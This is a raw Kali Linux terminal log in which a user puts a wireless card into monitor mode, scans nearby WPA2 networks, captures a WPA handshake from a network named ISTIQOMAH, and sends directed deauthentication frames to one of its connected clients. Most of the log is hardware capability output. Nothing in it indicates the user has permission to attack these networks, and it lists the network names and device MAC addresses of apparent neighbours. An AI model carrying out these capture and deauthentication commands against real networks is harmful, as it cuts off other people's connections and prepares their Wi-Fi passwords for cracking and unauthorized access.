(base) ┌──(krisna㉿laptop)-[~]
└─$ sudo airmon-ng start wlan1

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    675 NetworkManager
   1146 wpa_supplicant

PHY	Interface	Driver		Chipset

phy0	wlan0		rtw_8723de	Realtek Semiconductor Co., Ltd. RTL8723DE 802.11b/g/n PCIe Adapter
phy2	wlan1		mt7601u		Ralink Technology, Corp. MT7601U
		(monitor mode enabled)

                                                                                                             
(base) ┌──(krisna㉿laptop)-[~]
└─$ sudo airmon-ng check kill 

Killing these processes:

    PID Name
   1146 wpa_supplicant

                                                                                                             
(base) ┌──(krisna㉿laptop)-[~]
└─$ sudo airmon-ng start wlan1


PHY	Interface	Driver		Chipset

phy0	wlan0		rtw_8723de	Realtek Semiconductor Co., Ltd. RTL8723DE 802.11b/g/n PCIe Adapter
phy2	wlan1		mt7601u		Ralink Technology, Corp. MT7601U
		(mac80211 monitor mode already enabled for [phy2]wlan1 on [phy2]10)
                                                                                                             
(base) ┌──(krisna㉿laptop)-[~]
└─$ iw list 
Wiphy phy2
	wiphy index: 2
	max # scan SSIDs: 4
	max scan IEs length: 2257 bytes
	max # sched scan SSIDs: 0
	max # match sets: 0
	Retry short limit: 7
	Retry long limit: 4
	Coverage class: 0 (up to 0m)
	Device supports T-DLS.
	Supported Ciphers:
		* WEP40 (00-0f-ac:1)
		* WEP104 (00-0f-ac:5)
		* TKIP (00-0f-ac:2)
		* CCMP-128 (00-0f-ac:4)
		* CCMP-256 (00-0f-ac:10)
		* GCMP-128 (00-0f-ac:8)
		* GCMP-256 (00-0f-ac:9)
		* CMAC (00-0f-ac:6)
		* CMAC-256 (00-0f-ac:13)
		* GMAC-128 (00-0f-ac:11)
		* GMAC-256 (00-0f-ac:12)
	Available Antennas: TX 0 RX 0
	Supported interface modes:
		 * managed
		 * monitor
	Band 1:
		Capabilities: 0x17e
			HT20/HT40
			SM Power Save disabled
			RX Greenfield
			RX HT20 SGI
			RX HT40 SGI
			RX STBC 1-stream
			Max AMSDU length: 3839 bytes
			No DSSS/CCK HT40
		Maximum RX AMPDU length 65535 bytes (exponent: 0x003)
		Minimum RX AMPDU time spacing: 2 usec (0x04)
		HT TX/RX MCS rate indexes supported: 0-7, 32
		Bitrates (non-HT):
			* 1.0 Mbps (short preamble supported)
			* 2.0 Mbps (short preamble supported)
			* 5.5 Mbps (short preamble supported)
			* 11.0 Mbps (short preamble supported)
			* 6.0 Mbps
			* 9.0 Mbps
			* 12.0 Mbps
			* 18.0 Mbps
			* 24.0 Mbps
			* 36.0 Mbps
			* 48.0 Mbps
			* 54.0 Mbps
		Frequencies:
			* 2412.0 MHz [1] (20.0 dBm)
			* 2417.0 MHz [2] (20.0 dBm)
			* 2422.0 MHz [3] (20.0 dBm)
			* 2427.0 MHz [4] (20.0 dBm)
			* 2432.0 MHz [5] (20.0 dBm)
			* 2437.0 MHz [6] (20.0 dBm)
			* 2442.0 MHz [7] (20.0 dBm)
			* 2447.0 MHz [8] (20.0 dBm)
			* 2452.0 MHz [9] (20.0 dBm)
			* 2457.0 MHz [10] (20.0 dBm)
			* 2462.0 MHz [11] (20.0 dBm)
			* 2467.0 MHz [12] (20.0 dBm) (no IR)
			* 2472.0 MHz [13] (20.0 dBm)
			* 2484.0 MHz [14] (20.0 dBm) (no IR)
	Supported commands:
		 * new_interface
		 * set_interface
		 * new_key
		 * start_ap
		 * new_station
		 * new_mpath
		 * set_mesh_config
		 * set_bss
		 * authenticate
		 * associate
		 * deauthenticate
		 * disassociate
		 * join_ibss
		 * join_mesh
		 * remain_on_channel
		 * set_tx_bitrate_mask
		 * frame
		 * frame_wait_cancel
		 * set_wiphy_netns
		 * set_channel
		 * tdls_mgmt
		 * tdls_oper
		 * probe_client
		 * set_noack_map
		 * register_beacons
		 * start_p2p_device
		 * set_mcast_rate
		 * connect
		 * disconnect
		 * set_qos_map
		 * set_multicast_to_unicast
	software interface modes (can always be added):
		 * monitor
	interface combinations are not supported
	HT Capability overrides:
		 * MCS: ff ff ff ff ff ff ff ff ff ff
		 * maximum A-MSDU length
		 * supported channel width
		 * short GI for 40 MHz
		 * max A-MPDU length exponent
		 * min MPDU start spacing
	Device supports TX status socket option.
	Device supports HT-IBSS.
	Device supports SAE with AUTHENTICATE command
	Device supports low priority scan.
	Device supports scan flush.
	Device supports AP scan.
	Device supports per-vif TX power setting
	Driver supports full state transitions for AP/GO clients
	Driver supports a userspace MPM
	Device supports active monitor (which will ACK incoming frames)
	Device supports configuring vdev MAC-addr on create.
	max # scan plans: 1
	max scan plan interval: -1
	max scan plan iterations: 0
	Supported TX frame types:
		 * IBSS: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * managed: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * AP: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * AP/VLAN: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * mesh point: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * P2P-client: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * P2P-GO: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * P2P-device: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
	Supported RX frame types:
		 * IBSS: 0x40 0xb0 0xc0 0xd0
		 * managed: 0x40 0xb0 0xd0
		 * AP: 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0
		 * AP/VLAN: 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0
		 * mesh point: 0xb0 0xc0 0xd0
		 * P2P-client: 0x40 0xd0
		 * P2P-GO: 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0
		 * P2P-device: 0x40 0xd0
	Supported extended features:
		* [ RRM ]: RRM
		* [ FILS_STA ]: STA FILS (Fast Initial Link Setup)
		* [ CQM_RSSI_LIST ]: multiple CQM_RSSI_THOLD records
		* [ CONTROL_PORT_OVER_NL80211 ]: control port over nl80211
		* [ TXQS ]: FQ-CoDel-enabled intermediate TXQs
		* [ SCAN_RANDOM_SN ]: use random sequence numbers in scans
		* [ SCAN_MIN_PREQ_CONTENT ]: use probe request with only rate IEs in scans
		* [ CONTROL_PORT_NO_PREAUTH ]: disable pre-auth over nl80211 control port support
		* [ SCAN_FREQ_KHZ ]: scan on kHz frequency support
		* [ CONTROL_PORT_OVER_NL80211_TX_STATUS ]: tx status for nl80211 control port support
		* [ POWERED_ADDR_CHANGE ]: can change MAC address while up
Wiphy phy0
	wiphy index: 0
	max # scan SSIDs: 4
	max scan IEs length: 2257 bytes
	max # sched scan SSIDs: 0
	max # match sets: 0
	Retry short limit: 7
	Retry long limit: 4
	Coverage class: 0 (up to 0m)
	Device supports T-DLS.
	Supported Ciphers:
		* WEP40 (00-0f-ac:1)
		* WEP104 (00-0f-ac:5)
		* TKIP (00-0f-ac:2)
		* CCMP-128 (00-0f-ac:4)
		* CCMP-256 (00-0f-ac:10)
		* GCMP-128 (00-0f-ac:8)
		* GCMP-256 (00-0f-ac:9)
		* CMAC (00-0f-ac:6)
		* CMAC-256 (00-0f-ac:13)
		* GMAC-128 (00-0f-ac:11)
		* GMAC-256 (00-0f-ac:12)
	Available Antennas: TX 0x1 RX 0x1
	Configured Antennas: TX 0x1 RX 0x1
	Supported interface modes:
		 * IBSS
		 * managed
		 * AP
		 * AP/VLAN
		 * monitor
	Band 1:
		Capabilities: 0x196e
			HT20/HT40
			SM Power Save disabled
			RX HT20 SGI
			RX HT40 SGI
			RX STBC 1-stream
			Max AMSDU length: 7935 bytes
			DSSS/CCK HT40
		Maximum RX AMPDU length 65535 bytes (exponent: 0x003)
		Minimum RX AMPDU time spacing: 16 usec (0x07)
		HT Max RX data rate: 150 Mbps
		HT TX/RX MCS rate indexes supported: 0-7, 32
		Bitrates (non-HT):
			* 1.0 Mbps
			* 2.0 Mbps
			* 5.5 Mbps
			* 11.0 Mbps
			* 6.0 Mbps
			* 9.0 Mbps
			* 12.0 Mbps
			* 18.0 Mbps
			* 24.0 Mbps
			* 36.0 Mbps
			* 48.0 Mbps
			* 54.0 Mbps
		Frequencies:
			* 2412.0 MHz [1] (20.0 dBm)
			* 2417.0 MHz [2] (20.0 dBm)
			* 2422.0 MHz [3] (20.0 dBm)
			* 2427.0 MHz [4] (20.0 dBm)
			* 2432.0 MHz [5] (20.0 dBm)
			* 2437.0 MHz [6] (20.0 dBm)
			* 2442.0 MHz [7] (20.0 dBm)
			* 2447.0 MHz [8] (20.0 dBm)
			* 2452.0 MHz [9] (20.0 dBm)
			* 2457.0 MHz [10] (20.0 dBm)
			* 2462.0 MHz [11] (20.0 dBm)
			* 2467.0 MHz [12] (20.0 dBm) (no IR)
			* 2472.0 MHz [13] (20.0 dBm)
			* 2484.0 MHz [14] (20.0 dBm) (no IR)
	Supported commands:
		 * new_interface
		 * set_interface
		 * new_key
		 * start_ap
		 * new_station
		 * new_mpath
		 * set_mesh_config
		 * set_bss
		 * authenticate
		 * associate
		 * deauthenticate
		 * disassociate
		 * join_ibss
		 * join_mesh
		 * remain_on_channel
		 * set_tx_bitrate_mask
		 * frame
		 * frame_wait_cancel
		 * set_wiphy_netns
		 * set_channel
		 * tdls_mgmt
		 * tdls_oper
		 * probe_client
		 * set_noack_map
		 * register_beacons
		 * start_p2p_device
		 * set_mcast_rate
		 * connect
		 * disconnect
		 * set_qos_map
		 * set_multicast_to_unicast
		 * set_sar_specs
	software interface modes (can always be added):
		 * AP/VLAN
		 * monitor
	interface combinations are not supported
	HT Capability overrides:
		 * MCS: ff ff ff ff ff ff ff ff ff ff
		 * maximum A-MSDU length
		 * supported channel width
		 * short GI for 40 MHz
		 * max A-MPDU length exponent
		 * min MPDU start spacing
	Device supports TX status socket option.
	Device supports HT-IBSS.
	Device supports SAE with AUTHENTICATE command
	Device supports scan flush.
	Device supports per-vif TX power setting
	Driver supports full state transitions for AP/GO clients
	Driver supports a userspace MPM
	Device supports configuring vdev MAC-addr on create.
	Device supports randomizing MAC-addr in scans.
	max # scan plans: 1
	max scan plan interval: -1
	max scan plan iterations: 0
	Supported TX frame types:
		 * IBSS: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * managed: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * AP: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * AP/VLAN: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * mesh point: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * P2P-client: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * P2P-GO: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * P2P-device: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
	Supported RX frame types:
		 * IBSS: 0x40 0xb0 0xc0 0xd0
		 * managed: 0x40 0xb0 0xd0
		 * AP: 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0
		 * AP/VLAN: 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0
		 * mesh point: 0xb0 0xc0 0xd0
		 * P2P-client: 0x40 0xd0
		 * P2P-GO: 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0
		 * P2P-device: 0x40 0xd0
	Supported extended features:
		* [ RRM ]: RRM
		* [ SET_SCAN_DWELL ]: scan dwell setting
		* [ FILS_STA ]: STA FILS (Fast Initial Link Setup)
		* [ CONTROL_PORT_OVER_NL80211 ]: control port over nl80211
		* [ TXQS ]: FQ-CoDel-enabled intermediate TXQs
		* [ SCAN_RANDOM_SN ]: use random sequence numbers in scans
		* [ CAN_REPLACE_PTK0 ]: can safely replace PTK 0 when rekeying
		* [ CONTROL_PORT_NO_PREAUTH ]: disable pre-auth over nl80211 control port support
		* [ DEL_IBSS_STA ]: deletion of IBSS station support
		* [ SCAN_FREQ_KHZ ]: scan on kHz frequency support
		* [ CONTROL_PORT_OVER_NL80211_TX_STATUS ]: tx status for nl80211 control port support
		* [ POWERED_ADDR_CHANGE ]: can change MAC address while up
                                                                                                             
(base) ┌──(krisna㉿laptop)-[~]
└─$ iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
docker0   no wireless extensions.

wlan1     IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          
                                                                                                                          
(base) ┌──(krisna㉿laptop)-[~]
└─$ sudo airmon-ng check      


                                                                                                                          
(base) ┌──(krisna㉿laptop)-[~]
└─$ sudo airodump-ng wlan1


 CH  4 ][ Elapsed: 3 mins ][ 2024-08-16 04:16 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 20:87:EC:A9:AB:79  -70       37        0    0  11  130   WPA2 CCMP   PSK  5g_kostb20b                                   
 20:87:EC:A9:AB:78  -69       75        1    0  11  130   WPA2 CCMP   PSK  kostb20b                                      
 4C:C6:4C:8E:94:8E  -51      162        0    0   3  270   WPA2 CCMP   PSK  Indihohe                                      
 4C:3F:A7:30:05:05  -83       36        7    0   8  130   WPA2 CCMP   PSK  B19                                           
 66:88:8A:25:62:B2  -51      116        0    0  13  360   WPA2 CCMP   PSK  network                                       
 68:59:11:03:82:A8  -44      227       61    0   1  130   WPA2 CCMP   PSK  ISTIQOMAH                                     

 BSSID              STATION            PWR    Rate    Lost   Frames  Notes  Probes

 20:87:EC:A9:AB:79  8A:A6:BE:2D:CE:DC  -80    0 - 1      0        1                                                       
 (not associated)   DA:A1:19:1D:F3:6C  -30    0 - 6      0        2                                                       
 (not associated)   DA:A1:19:A1:1E:60  -32    0 - 6      0        2                                                       
 (not associated)   DA:A1:19:6B:54:17  -36    0 - 1      0        1                                                       
 (not associated)   DA:A1:19:EC:8B:04  -30    0 - 6      0        1                                                       
 20:87:EC:A9:AB:78  9C:6B:72:53:7B:51  -76    0 - 1      0       12                                                       
 66:88:8A:25:62:B2  30:68:93:E4:86:34  -40    0 - 6      0        2                                                       
Quitting...
                                                                                                                          
(base) ┌──(krisna㉿laptop)-[~]
└─$ sudo airodump-ng -c 1 --bssid 68:59:11:03:82:A8 -w /tmp/capture wlan1
04:17:55  Created capture file "/tmp/capture-01.cap".


 CH  1 ][ Elapsed: 4 mins ][ 2024-08-16 04:22 ][ WPA handshake: 68:59:11:03:82:A8 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 68:59:11:03:82:A8  -43   2     2856      303    4   1  130   WPA2 CCMP   PSK ISTIQOMAH                                 

 BSSID              STATION            PWR    Rate    Lost   Frames  Notes  Probes

 68:59:11:03:82:A8  2E:E2:3A:48:33:AD  -76    1e- 6e     0        8                                                       
 68:59:11:03:82:A8  72:5B:44:01:4D:90   -1    1e- 0      0       30                                                       
 68:59:11:03:82:A8  2A:D9:A0:89:76:24   -1    1e- 0      0       10                                                       
 68:59:11:03:82:A8  18:D7:17:71:23:83   -1    1e- 0      0      109                                                       
 68:59:11:03:82:A8  9C:B1:DC:9D:7E:AC   -1    1e- 0      0        5                                                       
 68:59:11:03:82:A8  BA:57:BA:0D:BB:8E  -84    1e- 1e     0     2690  EAPOL                                                
 68:59:11:03:82:A8  2E:5E:94:34:85:81  -78    1e- 1e   616      823                                                       
Quitting...
           
           
           
(base) ┌──(krisna㉿laptop)-[~]
└─$ sudo aireplay-ng -0 20 -a 68:59:11:03:82:A8 -c 2E:5E:94:34:85:81 wlan1
04:29:03  Waiting for beacon frame (BSSID: 68:59:11:03:82:A8) on channel 1
04:29:04  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [49|41 ACKs]
04:29:05  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [33|47 ACKs]
04:29:05  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 1|43 ACKs]
04:29:06  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 0|46 ACKs]
04:29:07  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 0|47 ACKs]
04:29:07  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [74|68 ACKs]
04:29:08  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [59|61 ACKs]
04:29:08  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 4|48 ACKs]
04:29:09  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 0|43 ACKs]
04:29:09  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [16|49 ACKs]
04:29:10  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 0|45 ACKs]
04:29:10  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 0|46 ACKs]
04:29:11  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 0|43 ACKs]
04:29:12  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 0|44 ACKs]
04:29:12  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 0|50 ACKs]
04:29:13  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 0|53 ACKs]
04:29:13  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 0|47 ACKs]
04:29:14  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 0|46 ACKs]
04:29:14  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 0|45 ACKs]
04:29:15  Sending 64 directed DeAuth (code 7). STMAC: [2E:5E:94:34:85:81] [ 0|47 ACKs]
